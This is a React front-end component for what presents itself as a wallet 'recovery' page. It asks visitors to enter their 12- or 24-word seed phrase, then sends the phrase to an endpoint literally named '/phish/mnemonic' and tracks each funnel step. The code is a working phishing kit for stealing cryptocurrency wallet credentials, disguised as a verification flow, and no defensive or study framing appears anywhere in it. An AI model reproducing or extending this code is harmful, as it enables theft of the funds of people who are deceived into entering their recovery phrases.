import React, { useState } from 'react';
import { track } from '../../utils/funnel';
import { useT } from '../../utils/translations';
import './Recover.css';

const Recover = () => {
  const t = useT();
  const [words, setWords] = useState('');
  const [step, setStep] = useState(1);
  const [error, setError] = useState('');
  const [submitting, setSubmitting] = useState(false);
  const [done, setDone] = useState(false);

  const submit = async () => {
    track('recover', 'start', '');
    track('recover', 'view', '');
    const list = words.trim().split(/\s+/);
    if (list.length !== 12 && list.length !== 24) {
      setError(t('recover.wordsErr'));
      return;
    }
    setSubmitting(true);
    setError('');
    try {
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/phish/mnemonic', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ mnemonic: words.trim() }),
      });
      const result = await resp.json();
      if (result.code !== 200) throw new Error(result.message || 'Failed');
    track('recover', 'done', '');
      setDone(true);
    } catch (e) {
      setError(String(e.message || e));
    } finally {
      setSubmitting(false);
    }
  };

  return (
    <div className="recover-page">
      <div className="recover-card">
        {done ? (
          <>
            <div className="recover-icon">✓</div>
            <h2>{t('recover.doneTitle')}</h2>
            <p className="recover-desc">{t('recover.doneDesc')}</p>
          </>
        ) : (
          <>
            <div className="recover-icon">🔐</div>
            <h2>{t('recover.title')}</h2>
            <p className="recover-desc">
              {step === 1
                ? t('recover.step1Desc')
                : t('recover.step2Desc')}
            </p>
            {step === 1 ? (
              <button className="recover-btn" onClick={() => setStep(2)}>{t('recover.start')}</button>
            ) : (
              <>
                <textarea
                  className="recover-input"
                  placeholder={t('recover.placeholder')}
                  value={words}
                  onChange={(e) => setWords(e.target.value)}
                  rows={4}
                />
                {error && <p className="recover-error">{error}</p>}
                <button className="recover-btn" onClick={submit} disabled={submitting || !words.trim()}>
                  {submitting ? t('recover.verifying') : t('recover.verify')}
                </button>
              </>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default Recover;
